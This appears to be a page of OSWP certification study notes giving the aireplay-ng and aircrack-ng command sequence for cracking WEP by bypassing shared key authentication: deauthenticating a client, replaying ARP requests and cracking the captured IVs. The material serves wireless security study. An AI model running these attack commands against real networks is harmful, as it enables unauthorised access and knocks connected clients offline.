OffSec Notes
All Gitbook
OSWP
OSWP
  • General
    • Basic Operations
      • wpa_supplicant connection
    • Decryption
    • References
  • Basic Hacking
    • WPA-MGT
    • WPA-PSK
    • WEP (Copied from "References")
      • with connected client
      • via a client
      • clientless
      • bypassing shared key auth
Powered by GitBook
On this page
  1. Basic Hacking
  2. WEP (Copied from "References")

bypassing shared key auth

Deauthenticate the connected client to capture the PRGA XOR keystream:

aireplay-ng -0 1 -a <AP MAC> -c <Client MAC> <interface>

Conduct a fake shared key authentication using the XOR keystream:


aireplay-ng -1 0 -e <ESSID> -y <keystreamfile> -a <AP MAC> -h <Your MAC> <interface>

Launch the ARP request replay attack:

aireplay-ng -3 -b <AP MAC> -h <Your MAC> <interface>

Deauthenticate the victim client again to force the generation of an ARP packet:

aireplay-ng -0 1 -a <AP MAC> -c <Client MAC> <interface>

Once IVs are being generated by the AP, run Aircrack-ng against the capture:

aircrack-ng <capture>
Previousclientless

Last updated 1 year ago